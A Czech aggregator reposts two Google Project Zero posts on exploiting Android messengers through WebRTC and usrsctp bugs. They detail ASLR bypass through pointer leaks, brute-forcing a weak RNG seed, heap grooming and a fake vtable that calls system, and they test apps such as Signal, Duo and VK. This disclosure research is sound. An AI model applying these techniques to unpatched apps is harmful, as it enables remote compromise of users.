Project Zero

Syndikovat obsah
News and updates from the Project Zero team at Google
Aktualizace: 47 min zpět

Exploiting Android Messengers with WebRTC: Part 3

6 Srpen, 2020 - 20:05
Posted by Natalie Silvanovich, Project Zero
This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. CVE-2020-6514 discussed in the blog post was fixed on July 14 with these CLs.This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 3: Which Messengers?In Part 2, I described an exploit for WebRTC on Android. In this section, I explore which applications it works on.The exploitWhen writing the exploit, I originally altered the SCTP packets sent to the target device by altering the source of WebRTC and recompiling it. This wasn’t practical for attacking closed source applications, so I eventually switched to using Frida to hook the binary of the attacking device instead. Frida’s hooking functionality allows for code to be executed before and after a specific native function is called, which allowed my exploit to alter outgoing SCTP packets as well as inspect incoming ones. Functionally, it is equivalent to altering the source of the attacking client, but instead of the alterations being made in the source at compile time, they are made dynamically by Frida at run time. The source for the exploit is available here.
There are seven functions that the attacking device needs to hook, as follows.
usrsctp_conninput // receives incoming SCTPDtlsTransport::SendPacket // sends outgoing SCTPcricket::SctpTransport::SctpTransport // detects when SCTP transport is readycalculate_crc32c // calculates checksum for SCTP packetssctp_hmac // performs HMAC to guess secret keysctp_hmac_m // signs SCTP packetSrtpTransport::ProtectRtp // suppresses RTP to reduce heap noise
These functions can be hooked as symbols, or as offsets in the binary.
There are also three address offsets from the binary of the target device that are needed for the exploit to work.  The offset between the system function and the malloc function, as well as the offset between the gadget described in the previous post and the malloc function are two of these. These offsets are in libc, which is an Android system library, so they need to be determined based on the target device’s version of Android. The offset from the location of the cricket::SctpTransport vtable to the location of malloc in the global offset table is also needed. This must be determined from the binary that contains WebRTC in the application being attacked.
Note that the exploit scripts provided have a serious limitation: every time memory is read, it only works if bit 31 of the pointer is set. The reasons for this are explained in Part 2. The exploit script has an example of how to fix this and read any pointer using FWD_TSN chunks, but this is not implemented for every read. For testing purposes, I reset the device until the WebRTC library was mapped in a favorable location.Android ApplicationsA list of popular Android applications that integrate WebRTC was determined by searching APK files on Google Play for a specific string in usrsctp. Roughly 200 applications with more than five million users appeared to use WebRTC. I evaluated these applications to determine whether they could plausibly be affected by the vulnerabilities in the exploit, and what the impact would be.
It turned out the ways applications use WebRTC are quite varied, but can be separated into four main categories.
  • Projection: the screen and controls of a mobile application is projected into a desktop browser with user consent for enhanced usability
  • Streaming: audio and video content is sent from one user to many users. Usually there is an intermediary server, so the sender does not need to manage possibly thousands of peers, and the content is recorded for later viewing
  • Browsers: all major browsers contain WebRTC to implement the JavaScript WebRTC API
  • Conferencing: two or more users communicate via audio or video in real time

The impact of the vulnerabilities used in the exploit is different for each of these categories. Projection is low risk, as a lot of user interaction is required to set up the WebRTC connection, and the user has access to both sides of the connection in the first place, so there is little to gain by compromising the other side. 
Streaming is also fairly low risk. While it’s possible that some applications use peer-to-peer connections when a stream has a low number of viewers, they usually use an intermediary server that terminates the WebRTC connection from the sending peer, and starts new connections with the receiving peers. This means that the attacker usually cannot send malformed packets directly to a peer. Even with a set-up where streaming is performed peer-to-peer, user interaction is required for the target to view the stream, and there’s often no way to limit who can access a stream. For this reason, streaming applications that use WebRTC are probably not useful for targeted attacks. Of course, it is possible that these vulnerabilities affect the servers used by streaming services, but this was not investigated in this research.
Browsers are almost certainly vulnerable to most bugs in WebRTC, because they allow a large amount of control over how it is configured. To exploit such a bug in a browser, an attacker would need to set up a host that acts like the other peer in the peer-to-peer connection, and convince the target to visit a webpage that starts a call to that host. In this case, the vulnerability would have a similar impact to other memory corruption vulnerabilities in JavaScript.
Conferencing is the highest risk usage of WebRTC, but the actual impact of a vulnerability depends on a lot of how users of an application contact each other. The highest risk design is an application where any user can contact any other user based on an identifier. Some applications require the callee to have interacted in a specific way with the caller before a call can be made, which makes users harder to contact a target and generally reduces risk. Some applications require users to enter a code or visit a link to start a call, which has a similar effect. There is also a large group of applications where it is difficult or impossible to call a specific user, for example chat roulette applications, and applications which have features that allow a user to start a call to customer support. 
For this research, I focused on conferencing applications that allow users to contact specific other users. This reduced my list of 200 applications to 14 applications, as follows.
NameInstalls on Play StoreFacebook Messenger1BGoogle Duo1BGoogle Hangouts1BViber500MVK100MOK and TamTam (similar apps by same vendor)100M/10MDiscord100MJiochat50MICQ10MBOTIM10MSignal10MSlack10M
This list was compiled on June 18, 2020. Note that a few applications were removed because their server was not operational on that day, or they were very difficult to test (for example, required watching multiple ads to make a single call).
One application tested will not be identified in this blog post, as a serious additional vulnerability was discovered in the process of testing that has not yet been fixed or reached its disclosure deadline. This blog post will be updated when the disclosure deadline has passed.Testing the ExploitThe following section describes my attempts to test the exploit against the above applications. Please note that due to the number of applications, limited time was spent on each, so there is no guarantee that every attack against WebRTC was considered. While I am very confident that applications found to be exploitable are indeed exploitable, I am less confident about applications found to be not exploitable. If you need to know whether a specific application is vulnerable for the purposes of protecting users, please contact the vendor instead of relying on this post.
SignalI started off by testing Signal because it is the only open-source application on this list. Signal integrates WebRTC as a part of a library called ringrtc. I built ringrtc and then Signal with symbols, and then hooked the needed symbols with the Frida script on the attacker device. I tried the exploit and it worked about 90% of the time!

This attack did not require any user interaction with the target device because Signal starts the WebRTC connection before an incoming call is answered, and this connection can accept incoming RTP and SCTP. The exploit is not 100% reliable on Signal and other targets because Bug 376 requires that a freed heap allocation is replaced with the next allocation of the same size performed by the thread, and occasionally another thread will do an allocation of the same size in the meantime. Failure results in a crash that is usually not evident to the user because the process respawns, but a missed call will appear.
This exploit was performed on Signal 4.53.6 which was released on January 13, 2020, as Bug 376 had already been patched in Signal by the time I finished the exploit. CVE-2020-6514 was also fixed in later versions, and ASCONF has also been disabled in usrsctp, so the code that caused Bug 376 is no longer reachable. Signal has also recently implemented a feature that requires user interaction for the WebRTC connection to be started when the caller is not in the callee’s contacts. Signal has also stopped using SCTP in their beta version, and plans to add this change to the release client once it is tested. The source for this exploit is available here.
Google Duo
Duo was also an interesting target, as it is preinstalled on so many Android devices. It dynamically links the Android WebRTC library, with no obvious modifications. I reverse engineered this library in IDA to find the location of all the functions that needed to be hooked, and then modified the Frida script to hook them based on their offsets from an exported symbol. I also modified the offset between the cricket::SctpTransport vtable and the global offset table, as it was different than in Signal. The exploit also worked on Duo. Source for the Duo exploit is available here.

This vulnerability did not require any user interaction, as like Signal, Duo starts the WebRTC connection before a call is answered.
The exploit was tested on version 68.0.284888502.DR68_RC09 which was released on December 15, 2019. The vulnerability has since been fixed. Also, at the time this application was released, it was possible for Duo to call any Android device with Google Play Services installed, regardless of whether Duo had been installed. This is no longer the case. A user now needs to set up Duo and have the caller in their contacts for an incoming call to be received.Google Hangouts
While Google Hangouts uses WebRTC, it does not use data channels, and does not exchange SDP in order to set up calls, so there is no obvious way to enable them from a peer. For that reason, the exploit does not work on Hangouts.Facebook Messenger
Facebook Messenger is another interesting target. It has a large number of users, and according to its documentation, any user can call any other user based on their mobile number. Facebook Messenger integrates WebRTC into a library called, which dynamically links to usrsctp from another library, Facebook Messenger downloads these libraries dynamically as opposed to including them in the APK, so it is difficult to identify the version I examined, but it was downloaded on June 22, 2020. 
The library appears to use a version of WebRTC that is roughly six years old, so it was before the class cricket::SctpTransport existed. That said, the analogous class cricket::DataMediaChannel appeared to be vulnerable to CVE-2020-6514. The library appears to be more modern, but contains the vulnerable code for Bug 376. That said, it does not appear to be possible to reach this code from Facebook Messenger, as it is set to use RTP data channels as opposed to SCTP data channels, and does not accept attempts to change the channel type via Session Description Protocol (SDP). While it is not clear whether the motivation behind this design is security, this is a good example of how restricting attacker access to features can reduce an application’s vulnerability. Facebook also waits until a call is answered before starting the WebRTC connection, which further reduces the exploitability of any WebRTC vulnerabilities that affect it.
Interestingly, Facebook Messenger also contains a more modern version of WebRTC in a library called, but it does not appear to be used by the application. It is possible to get Facebook Messenger to use the alternate library by setting a system property on Android, but I could not find a way an attacker could cause a device to switch libraries.Viber
Like Facebook Messenger, while Viber version appeared to contain the vulnerable code, but the application disables SCTP when the PeerConnectionFactory is created. This means an attacker cannot reach the vulnerable code.VK
VK is a social networking app released by in which users have to explicitly allow specific other users to contact them before each user is allowed to call them. I tested my exploit against VK, and it required some modifications to work. To start, VK doesn’t use data channels as a part of its WebRTC connection, so I had to enable it. To do this, I wrote a Frida script that hooks nativeCreateOffer in Java, and makes a call to createDataChannel before the offer is created. This was sufficient to enable SCTP on both devices, as the target device determines whether to enable SCTP based on the SDP provided by the attacker. The version of WebRTC was also older than the one I wrote the exploit for. WebRTC doesn’t contain any version information, so it is difficult to tell for sure, but the library appeared to be at least one year old based on log entries. This meant that some of the offsets in the ‘fake object’ used by the exploit were different. With a few changes, I was able to exploit VK.
VK sends an SDP offer to a target device to start a call, but the target does not return the SDP answer until the user has accepted the call, which means this exploit requires the target to answer the call before the WebRTC connection is started. This means the exploit will not work unless the target manually answers the call. In the video below, the exploit takes a fair amount of time to run after the user has answered. This is due to how I designed the exploit, and not due to fundamental limitations of the vulnerabilities it uses. In particular, the exploit waits for usrsctp to generate specific packets even though they could be generated more quickly by the exploit script, and also uses delays to avoid packet reordering when responses could be checked instead. It is likely that with enough effort, this exploit could run in less than five seconds. Also note that I altered the exploit to work with a single incoming call, as opposed to two incoming calls in the exploits above, as it is not realistic to expect a target to answer a call twice in quick succession. This didn’t require substantial changes to how the exploit works, though it does make the exploit code more complex and difficult to debug.

Regardless, the requirement that a user must choose to accept calls from an attacker before they can call, alongside the requirement that the user answer the call and stay on the line for a few seconds makes this exploit substantially less useful against VK compared to applications without these features.
Testing was performed against VK 6.7 (5631). Like Facebook, VK dynamically downloads its version of WebRTC, so it is difficult to specify its version, however testing was performed on July 13, 2020. VK has since updated their servers so that a user cannot start a call with SDP that contains data channels, so the exploit no longer works. Note that VK does not use WebRTC for two-party calls, only group calls, so I tested this exploit using a group call. The source for the exploit is available here.OK and TamTam
OK and Tamtam are similar messaging applications released by the same vendor, also They use a dynamically downloaded version of WebRTC that is identical to the one used by VK. Since the library is exactly the same, my exploit also worked on OK, and I didn’t bother also testing TamTam because it is so similar.

Like VK, OK and TamTam do not return the SDP answer until the target has answered the call by interacting with the phone, so this is not a fully remote exploit on OK and TamTam. OK also requires users to choose to accept messages from another user before the user can call them. TamTam is a bit more liberal, for example, if a user verifies a phone number, any user who has their phone number can contact them.
Testing was performed on version 20.7.7 of OK on Monday, July 13. SDP-only testing was performed on TamTam version 2.14.0. Since then, the servers for these applications have been updated so that SDP containing data channels cannot be used to start a call, so the exploit no longer works.
DiscordDiscord has documented its use of WebRTC thoroughly. The application uses an intermediary server for WebRTC connections, which means that it is not possible for a peer to send raw SCTP to another peer, which is required for the exploit to work. Discord also requires several clicks to enter a call. For these reasons, Discord is not affected by the vulnerabilities discussed in this post.JioChat
JioChat  is a messaging application that allows for any user to call any other user based on phone number. Analyzing version, it appeared that its WebRTC integration contained both vulnerabilities, and the app exchanges the SDP offer and answer before the callee accepts the incoming call, so I expected the exploit to work without user interaction. However, this was not the case when I tested it, and it turns out that JioChat uses a different strategy to prevent the WebRTC connection from starting until the callee has accepted the call. I was able to easily bypass this strategy, and get the exploit to work on JioChat.

Unfortunately, JioChat’s connection delay strategy introduced another vulnerability, which has been fixed, but the disclosure period has not expired for. For this reason, details of how to bypass it will not be shared in this blog post. The source for the exploit without this functionality is available here. JioChat has recently updated their servers so that SDP containing data channels cannot be used to start a call, meaning that the exploit no longer works on JioChat.Slack and ICQ
Slack and ICQ are similar in that they both integrate WebRTC, but do not use the transport features of the library (note that Slack doesn’t integrate WebRTC directly for audio calls, it integrates Amazon Chime, which integrates WebRTC). They both use WebRTC for audio processing only, but implement their own transport layer and do not use WebRTC’s RTP and SCTP implementations. For this reason, they are not vulnerable to the bugs discussed in this blog post, and many other WebRTC bugs.
BOTIM has an unusual design that prevents the exploit from working. Instead of calling createOffer and exchanging SDP, each peer generates its own SDP based on a small amount of information from the peer. SCTP is not used by this application by default, and it was not possible to use SDP to turn it on. Therefore, it was not possible to use this exploit. BOTIM does appear to have a mode where it exchanges SDP with a peer, but I could not figure out how to enable it.Other Application
The exploit worked in a fully remote fashion on one other application, but setting up the exploit revealed an obvious additional serious vulnerability in the application. Details of the exploit’s behavior on the application will be released after the disclosure period has expired for the vulnerability.DiscussionThe Risk of WebRTCOut of the 14 applications analyzed, WebRTC enabled a fully remote exploit on four applications, and a one-click exploit on two more. This highlights the risk of including WebRTC in a mobile application. WebRTC does not pose a substantially different risk than other video conferencing solutions, but the decision to include video conferencing in an application introduces a large remote attack surface that wouldn’t be there otherwise. WebRTC is one of the few fully remote attack surfaces of a mobile application, and of Android in general. It is likely the highest risk component in almost every application that uses it for video conferencing.
Video conferencing is vital to the functionality of some applications, but in others it is an ‘extra’ that is rarely used. Low usage does not make video conferencing any less of a risk to users. It is important for software makers to consider whether video conferencing is a truly necessary part of their application, with a full understanding of the risk it presents to users.WebRTC PatchingThis research showed that many applications fall behind with regard to applying security updates to WebRTC. Bug 376 was fixed in September of 2019, yet only two of the 14 applications analyzed had patched it. There were several factors that led to this.
To start, usrsctp does not have a formal process for identifying and communicating vulnerabilities. Instead, bug 376 was fixed like any other bug, so the code was not pulled into WebRTC until March 10, 2020.  Even after it was patched, the bug was not noted on the Security Notes for the Chrome Stable channel, which is where WebRTC tells developers to look for security updates. This means that developers of applications that use an older version of WebRTC and cherry-pick fixes, or applications that include usrsctp separately from WebRTC would not be aware of the need to apply this patch.
This is not the full story though, as many applications include WebRTC as an unmodified library, and there have been other WebRTC vulnerabilities included in the Chrome Security Notes since March 2020. Another contributing factor is that until 2019, WebRTC did not provide any security patching guidance to integrators, in fact, their website inaccurately said that no vulnerabilities had ever been reported in the library, which occurred because WebRTC security bugs are generally filed in the Chromium bug tracker, and there was no process for considering these bug’s impact on non-browser integrators at the time. Many of the applications I analyzed had versions of WebRTC that predated this, so it is likely that the legacy of this incorrect guidance still causes applications to not update WebRTC. While WebRTC has done a lot to make it easier for integrators to patch WebRTC, for example allowing large integrators to apply for advance notice of vulnerabilities, there is still likely a long tail of integrators who have only seen the old guidance. Of course, there is no guarantee that integrators would have followed better guidance if it was available, but considering that for a long time it was very difficult for an integrator to know when and how to update WebRTC even if they wanted to, it is likely it would have had an impact.
Integrators also have a responsibility to keep WebRTC up to date with security fixes, and many of them have failed in this area. It was surprising to see so many versions of WebRTC that are well over a year old. Developers should monitor every library they integrate for security updates, and apply them promptly.Application Design
Application design affects the risk posed by WebRTC, and many applications researched were designed well. The easiest, and most important way to limit the security impact of WebRTC is to avoid starting the WebRTC connection until the callee has accepted the call by interacting with the device. This turns an exploit that can compromise any user quickly into an exploit that requires user interaction, and won’t be successful on every target. It also makes lower quality vulnerabilities not practically exploitable, because while a fully remote exploit can be attempted many times without the user noticing, an exploit that requires a user to answer a call needs to work in a small number of tries.
Starting the WebRTC connection late has a performance impact, and precludes certain features, like giving the callee a preview of the call. Of the applications that the exploit worked on, two started the connection without user interaction, and two required user interaction. JioChat and the application we are not yet identifying tried to use unique tricks to delay the connection until the user accepted the call without performance impact, but introduced vulnerabilities as a result. Developers should be aware that the best way to delay a WebRTC connection is to avoid calling setRemoteDescription until the user has accepted the call.  Other methods might not actually delay the connection and can cause other security problems.
Another way to reduce the security risk of WebRTC is to limit who an attacker can call, for example by requiring that the callee have the user in their contact list, or only allowing calls between users that have agreed to be able to message each other in the application. Like delaying the connection, this greatly reduces the targets an attacker can reach without a lot of effort.
Finally, integrators should limit the features of WebRTC an attacker can use to the features the application needs. Many applications were not vulnerable to this specific exploit because they had effectively disabled SCTP. Others did not use SCTP, but did not disable it in a way that prevented attackers from using it, and I was able to enable it. The best way to disable a feature in WebRTC is to remove it at compile time, which is supported for certain codecs. It is also possible to disable certain features through the PeerConnection and PeerConnectionFactory, and this is also very effective. Features can also be disabled by filtering SDP, but it is important to make sure that the filter is robust and tested thoroughly.ConclusionI wrote an exploit for WebRTC for Android involving two vulnerabilities in usrsctp. This exploit was fully remote on Signal, Google Duo, JioChat and one other application, and required user interaction on VK, OK and TamTam. Seven other messengers were not affected because they effectively disabled SCTP. Several applications used versions of WebRTC that did not include patches for either of the vulnerabilities used in the exploit. One remains unpatched. Low patch uptake is partially a result of WebRTC historically providing poor patching guidance. Integrators can reduce the risk of WebRTC by requiring user interaction to start a WebRTC connection, limiting who users can call easily and disabling unused features. They should also consider whether video conferencing is an important and necessary feature of their application.
Vendor ResponseThe software vendors mentioned in this blog post were given a chance to review this post before it was posted publicly, and some provided responses, as follows.
The WebRTC bug that was used both to bypass ASLR and move the instruction pointer has been fixed. WebRTC no longer passes the SctpTransport pointer directly into usrsctp, using an opaque identifier that is mapped to a SctpTransport instead, with invalid values being ignored. We have identified and patched every affected Google product and reached out to 50 applications and integrators using WebRTC, including all applications analyzed in this post. For all applications and integrators who have not yet patched the vulnerability, we recommend updating to the WebRTC M85 branch, or patching the following two commits: 1, 2.
User security is of the highest priority for all Group products, which include VK, OK, TamTam and others. Acting on the information we received regarding the vulnerability, we immediately started the process of updating our mobile apps to the latest version of WebRTC. This update is currently underway. We have also implemented algorithms on our servers that no longer allow this vulnerability to be exploited in our products. This action allowed us to fix the issue for all of our users within 3 hours of receiving the information with an exploit demonstration.
We appreciate the effort that went into finding these bugs and improving the security of the WebRTC ecosystem. Signal had already shipped a defensive patch that protected users from this exploit prior to its discovery. In addition to routine updates of our calling libraries, we continue to take proactive steps to mitigate the impact of future WebRTC bugs.
We're pleased to see that this report concludes that Slack is not impacted by the referenced WebRTC vulnerabilities and exploits. Upon learning about this risk, we undertook additional diligence and confirmed that the entirety of our Calls service is not impacted by the vulnerabilities and findings described here.
Kategorie: Hacking & Security

Exploiting Android Messengers with WebRTC: Part 2

5 Srpen, 2020 - 18:01
Posted by Natalie Silvanovich, Project Zero
This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 3 is scheduled for August 6.Part 2: A Better Bug
In Part 1, I explored whether it was possible to exploit WebRTC using two memory corruption bugs in RTP processing. While I succeeded at moving the instruction pointer, I was not able to break ASLR, so I decided to look for vulnerabilities more suitable for this purpose.usrsctp
I started off by going through WebRTC bugs I had filed in the past to see if any had the potential to break ASLR. Even if a bug was fixed long ago, it is an indicator of where similar bugs could potentially be found. One such bug was CVE-2020-6831, which is an out-of-bounds read in usrsctp.
usrsctp is an implementation of Stream Control Transmission Protocol (SCTP) used by WebRTC. Applications that use WebRTC can open data channels, which allow text or binary data to be transmitted from peer to peer. Data channels are often used to allow text messages to be exchanged during a video call, or to tell a peer when certain events have occurred, such as another peer disabling its camera. SCTP is the protocol that underlies data channels. In WebRTC, SCTP is analogous to RTP in that where RTP is used for audio and video content, SCTP is used for data.
I spent some time reviewing the usrsctp code for vulnerabilities. I eventually found CVE-2020-6831, which is a stack buffer overflow in usrsctp. This bug gives the attacker complete control of the size and contents of the overflow. Samuel Groß suggested that this bug could be used to break ASLR by overwriting the stack cookie, and then the return address one byte at a time, and detecting whether the value is correct based on whether the application crashes. Unfortunately, it turned out that this vulnerability is not reachable through WebRTC, as it requires a client socket to connect to a listening socket, meanwhile in WebRTC, both sockets are client sockets.
I kept looking and eventually found CVE-2020-6514. This is a rather unusual bug in how WebRTC interacts with usrsctp. usrsctp supports custom transports, in which case the integrator needs to provide the source and destination address for each connection as a pair of void pointers. The non-dereferenced value of these pointers is then used as an address by usrsctp, which means the value is included in some packets. In WebRTC, the address pointers are set to the address of the SctpTransport instance used by WebRTC. The result is that the location of this object in memory is sent to the remote peer during every SCTP connection. This is technically a bug in WebRTC, though the design of usrsctp is also flawed because using the type void* for custom addresses strongly encourages integrators to use pointers for this value even though this is insecure.
I was hoping this bug would be enough to break ASLR, but it turned out not to be. For an exploit, I needed the location of a loaded library, as well as the location of the heap, so I ran a series of tests on an Android device to see if there was any correlation between these locations, but there was not any. The location of a heap pointer was not enough to determine the location of a loaded library.
I kept looking, and I noticed a vulnerability in how usrsctp processes ASCONF chunks, which are used to manage dynamic IP addresses. The source for the bug is as follows.
if (param_length > sizeof(aparam_buf)) { SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) larger than buffer size!\n", param_length); sctp_m_freem(m_ack); return;}
if (param_length <= sizeof(struct sctp_paramhdr)) { SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) too short\n", param_length); sctp_m_freem(m_ack);}
Notice that the second call to sctp_m_freem is missing a return, so the m_ack variable can be used after it is freed. After finding this bug, I noticed that it had been patched in more recent versions of usrsctp and WebRTC. I later learned that it was reported by another Googler, Mark Wodrich as Bug 376 in usrsctp on September 19, 2019.Revealing Memory with Bug 376
Two important questions in analyzing a use-after-free bug is what is freed, and how is it used. In Bug 376, the freed object is an mbuf structure, a type which is used to store the contents of inbound and outbound packets. The mbuf structure starts with a substructure, m_hdr, which is defined as follows.
struct m_hdr { struct mbuf *mh_next; /* next buffer in chain */ struct mbuf *mh_nextpkt; /* next chain in queue/record */ caddr_t mh_data; /* location of data */ int mh_len; /* amount of data in this mbuf */ int mh_flags; /* flags; see below */ short mh_type; /* type of data in this mbuf */ uint8_t          pad[M_HDR_PAD];/* word align                  */}
Now, how is this structure used? Looking through the rest of the ASCONF handling, it is eventually added to an outbound packet queue to acknowledge the packet that was sent.
TAILQ_INSERT_TAIL(&stcb->asoc.asconf_ack_sent, ack, next);
This made it very likely that this bug could be used to reveal memory of a remote peer if the freed m_buf structure was replaced with a structure with a pointer to memory continuing pointers, for example, the SctpTransport pointer revealed by CVE-2020-6514.
I tried to do this by sending RTP packets of the same size as the m_buf structure. There’s a nice trick for making a lot of allocations of a specific size that don’t get freed in WebRTC. Video packets get stored in a list before they are assembled into frames, so if the end of a frame is never sent, they will get stored forever, so long as a maximum number of packets is never hit. Unfortunately, this led to an unexpected problem. OpenSSL, which is used by WebRTC happened to have some heap allocations of the same size as an m_buf structure, and if they happened to be allocated in the place of the freed m_buf structure, they would get written to in the m_buf send process, which for some reason would lead to an irrecoverable state in OpenSSL. The application didn’t crash, it would just get stuck in some sort of loop and refuse to accept any more connections.
So I decided it would be better to allocate the memory replacing the m_buf structure in usrsctp. SCTP allows packets containing any number of chunks to be sent to a host, and in most cases they are processed as if they were a sequence of packets. Even better, the outbound packet queue that the freed m_buf structure is added to does not send any packets until all chunks in the current packet have been processed. This means that it should be possible to send a packet that contains a chunk that triggers the bug, and then a chunk that sets the freed memory to the needed values before it is sent back to the attacker. Since no network traffic needs to occur between when the m_buf structure is freed and when its memory is safely reallocated, this avoids the problem with OpenSSL.
Unfortunately, there are very few calls to malloc in usrsctp with sizes that are controllable by incoming traffic, and none of them allow the entire packet contents to be specified. The best I could find was in the processing of a data stream reset chunk. The code is as follows, with some parts removed for clarity.
if (asoc->str_reset_seq_in == seq) { len = ntohs(req->ph.param_length); number_entries = ((len - sizeof(struct sctp_stream_reset_out_request)) / sizeof(uint16_t)); tsn = ntohl(req->send_reset_at_tsn); asoc->last_reset_action[1] = asoc->last_reset_action[0]; if (...) { ... } else if (SCTP_TSN_GE(asoc->cumulative_tsn, tsn)) { /* we can do it now */ ... } else { /* * we must queue it up and thus wait for the TSN's * to arrive that are at or before tsn */ struct sctp_stream_reset_list *liste; int siz; siz = sizeof(struct sctp_stream_reset_list) + (number_entries * sizeof(uint16_t)); SCTP_MALLOC(liste, struct sctp_stream_reset_list *, siz, SCTP_M_STRESET); if (liste == NULL) { /* gak out of memory */ asoc->last_reset_action[0] = SCTP_STREAM_RESET_RESULT_DENIED; sctp_add_stream_reset_result(chk, seq, asoc->last_reset_action[0]); return; } liste->seq = seq; liste->tsn = tsn; liste->number_entries = number_entries; memcpy(&liste->list_of_streams, req->list_of_streams, number_entries * sizeof(uint16_t)); TAILQ_INSERT_TAIL(&asoc->resetHead, liste, next_resp);
This code allocates the liste structure, which can be used to replace the freed mbuf structure. It has one really lucky feature, which is that the next_resp property, which lines up with the mh_next property of the mbuf structure happens to be of the correct type, also mbuf. This would cause problems if it were another type, as usrsctp iterates through the entire mbuf chain before sending a packet.
A less lucky feature is that the properties that line up with the mh_data property of mbuf structure happen to be the current reset sequence number, and the transmission sequence number (TSN). These both are subject to a number of checks in this method. The reset sequence number needs to be exactly equal to the sequence number set when the connection was initialized, either in an INIT or COOKIE_ECHO chunk, and also needs to be equal to the lower four bytes of the SctpTransport pointer. This check can be passed by sending a COOKIE_ECHO chunk that sets the reset sequence number to the needed value before triggering the bug.
More challenging is the check that is performed on the TSN. It is compared to the cumulative TSN, which is originally set to the same value as the reset sequence number. The actual comparison performed is a ‘sequence number greater than’, which determines whether one value is ahead of or behind another value, assuming sequence numbers that roll over to zero when all bits are set. For example, if the current sequence number is 0xFFFFFFFF, the value 2 would pass a  ‘sequence number greater than’ check, but the values 0xFFFFFFFE and 0x80000001 would fail. The TSN read out of the incoming packet has to be the top four bytes of the SctpTransport pointer, meanwhile the cumulative TSN has to be the bottom four bytes of this pointer because it is the same value as the reset sequence number. So this is actually a comparison between the two halves of the pointer. The TSN is a small number, less than 0x80 because it is the top of a pointer, so this comparison will return true roughly whenever bit 31 of the pointer is not set, and return the desired outcome of false roughly whenever it is set.
Bit 31 of the pointer is determined randomly by ASLR as well as where the SctpTransport instance is allocated on the heap, which means it is set about 50% of the time. Normally, I would be okay with an exploit being 50% effective, because that means it would probably succeed with a few tries, but in this case, that’s not true because it will have the tendency to fail again and again on the same ASLR layout. ASLR layout is determined when an Android device is started up, and doesn’t change again until it is rebooted. So I needed a way to change the cumulative TSN after the reset sequence number has been set.
It turns out that this is possible using the FWD_TSN chunk type, which allows a peer to request that another peer move its cumulative TSN up to 4096 bytes forward. It’s possible to move the cumulative TSN forward enough that bit 31 flips by sending this chunk type repeatedly.  This takes quite a few chunks, but combining chunks into fewer packets and sending them as fast as possible, it can be flipped in a few seconds.
Putting this all together, the bug can be used to make the target device send back the memory of the SctpTransport instance, which contains a pointer to the class’s vtable, finally giving the location of the WebRTC library and breaking ASLR.
Thinking about it a bit, I didn’t think the WebRTC library would be the best library to use for my exploit, as it’s not unusual for WebRTC integrators to statically link it with other libraries and use all sorts of toolchains. It would be easier to know the location of libc, which comes from the Android system and has less variation. So I added a second usage of this bug that reads the location of malloc from the global offset table, which is a fixed offset from the SctpTransport vtable that has already been read. This allows the location of libc to be calculated.Moving the Instruction Pointer (Again)
In Part 1, I figured out how to use an RTP memory corruption bug to move the instruction pointer, but after I filed CVE-2020-6514, Jann Horn suggested that it might be possible to use this bug to move the instruction pointer as well. When WebRTC uses the SctpTransport pointer as an address, it doesn’t just use it to identify the connection, but it actually casts the pointer to class SctpTransport, and makes virtual calls on it when sending outbound packets received from usrsctp.
Meanwhile, usrsctp usually determines the address for outbound packets based on identifiers in the packet, but there is one situation where it extracts the address from the packet itself: when processing COOKIE_ECHO chunks. Normally, it wouldn’t be possible to put an untrusted pointer in this chunk type, as are usually echoed from an incoming packet and need to be signed. However, Jann noticed that the random number generation for the signing key is very weak. The following code gets called when usrsctp is initialized.
The random number generator is then seeded by calling rand.
The INIT chunk sent when starting an SCTP connection contains a randomly generated key used for authentication, generated by the same random number generator used for the secret key. I wrote a script that determines the value of the remote PID based on this key, by calling srand on every number between 0 and 70 000, and seeing which one causes the random number generator to produce the same authentication key. It is then possible to infer the value of the secret key.
This key now allows the attacking device to send COOKIE_ECHO chunks with any contents, including changing the address to a custom pointer. This allows the instruction pointer to be moved, as a virtual call will be made on whatever address is provided the next time an outbound packet is sent, which happens immediately when the peer responds with a COOKIE_ACK. In the above section, I also discussed using COOKIE_ECHO packets to change the reset sequence number, while glossing over how I was actually sending them. It was using this same method.
I now had two possible methods for setting the instruction pointer in the exploit. I chose to move forward with this one, as it uses usrsctp, which is also necessary to break ASLR, meanwhile the RTP one uses a different feature. I felt that reducing the number of features needing to be enabled for this exploit to work would increase the number of applications it worked on, as sometimes applications disable specific WebRTC features.Putting it All Together
Having all the necessary capabilities for an exploit, I then needed to put them all together. My general strategy was to make a fake object on the heap at a known location, and then make a virtual call on that object. The fake object would have a fake vtable in the same buffer that would point to system, which would run a shell command.
One missing piece is how to populate heap memory at a known location. One possibility was to use RTP to allocate memory of the same size as the SctpTransport object, hoping it gets allocated at the address directly after the object, or at a predictable location. I tried this, and it worked maybe 50% of the time, but considering I had a way to read memory, I thought I could do better.
I noticed that the SctpTransport class contains a CopyOnWriteBuffer object named partial_incoming_message_ that is sometimes used to store incoming SCTP data. SCTP supports data fragmentation, and usrsctp passes incomplete fragmented packets to WebRTC if they get above a certain size. These are stored in the partial_incoming_message_ object until the rest of the packet is received. So I thought if I sent the data for the fake object over SCTP to the target device, it would eventually populate this buffer, and I could read the address. (Note that this actually requires two reads, as there are two levels of indirection between a CopyOnWriteBuffer object and its backing data.)
I tried this, and it worked, but there was another problem. In order to create a fake object with a fake vtable, the fake object needed to reference itself, but this method only allowed me to know the location of the memory after it had been written to and couldn’t be changed. I looked a bit closer at how this functionality works. The code for setting the buffer is as follows.
transport->partial_incoming_message_.AppendData(          reinterpret_cast<uint8_t*>(data), length);          ...if (!(flags & MSG_EOR) && (transport->partial_incoming_message_.size() < kSctpSendBufferSize)) {        return 1;      }...transport->invoker_.AsyncInvoke<void>( RTC_FROM_HERE, transport->network_thread_, rtc::Bind(&SctpTransport::OnInboundPacketFromSctpToTransport, transport, transport->partial_incoming_message_, params, flags));transport->partial_incoming_message_.Clear();
What’s happening here is that incoming data is always immediately appended to the partial_incoming_message_ buffer, and then if it is an incomplete fragment, the function returns. Otherwise, it queues a thread to process the data, and then clears the buffer.
